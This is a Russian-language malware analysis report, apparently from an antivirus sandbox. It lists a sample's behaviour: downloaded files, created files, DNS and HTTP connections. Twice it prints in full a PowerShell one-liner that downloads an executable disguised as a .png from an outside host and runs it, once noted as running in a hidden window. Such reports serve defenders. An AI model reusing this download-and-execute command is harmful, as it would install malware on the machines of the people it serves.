Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- https://my.vndx.com/images/dde60c5776c175c54d23d2b0c.png как %temp%\blwsqeq.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://my.vndx.com/images/dde60c5776c175c54d23d2b0c.png','%TMP%\Blwsqeq.exe');Start-Process '%TMP%\Blwsqeq.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1408
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1286789.cvr
Сетевая активность
Подключается к
- 'my.#ndx.com':443
- 'ca#####.rapidssl.com':80
TCP
Запросы HTTP GET
- http://ca#####.rapidssl.com/RapidSSLTLSRSACAG1.crt
Другие
- 'my.#ndx.com':443
UDP
- DNS ASK my.#ndx.com
- DNS ASK ca#####.rapidssl.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://my.vndx.com/images/dde60c5776c175c54d23d2b0c.png','%TMP%\Blwsqeq.exe');Start-Process '%TMP%\Blwsqeq.exe'; (со скрытым окном)
